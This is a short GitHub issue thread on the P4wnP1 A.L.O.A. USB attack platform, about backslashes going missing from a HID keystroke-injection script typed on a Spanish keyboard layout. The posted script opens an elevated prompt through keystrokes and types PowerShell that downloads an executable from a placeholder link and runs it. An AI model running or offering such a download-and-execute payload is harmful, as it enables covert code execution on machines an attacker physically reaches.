RoganDawes/P4wnP1_aloa #58: hid attack doesnt type backslashes

iozalla, 2019-01-03:
`function startntp() {
	press("GUI ");
	delay(500);
   
	type("notepad")
    delay(500);
    press("CTRL SHIFT ENTER"); //start with CTRL+SHIFT+ENTER (run as admin)
    delay(2000); //wait for confirmation dialog (no check if a password is required, assume login user is admin)
    press("SHIFT TAB"); //switch to dialog confirmation
    press("ENTER");
    type("(New-Object Net.Webclient).DownloadFile('downloadlink',");
    type('"C:\\Users\\Public\\AppData35003.exe"); Start-Process -FilePath "C:\\Users\\Public\\AppData\\35003.exe"');
    type('Start-Process -FilePath "Desktop\\35003.exe');
    delay(500);
press("CTRL G");
  type("C:\\Users\\Public\\AppDataTEMP.ps1");
}` 

when runned everything gets typped except the backslashes
i tried with one backslash "\" and 2 backslashes "\\" and none of them would type anything

it seems like javascript ignores them

mame82, 2019-01-03:
Correct escape sequence for a backslash is `\\` as used in your script.

Which language layout are you using?

mame82, 2019-01-03:
Oh I noticed that your whole script is wrapped into backticks, is this a copy paste issue?

iozalla, 2019-01-04:
> Oh I noticed that your whole script is wrapped into backticks, is this a copy paste issue?

yep

> Correct escape sequence for a backslash is `\\` as used in your script.
> 
> Which language layout are you using?

i'm using spanish

closed 2020-03-18 by iozalla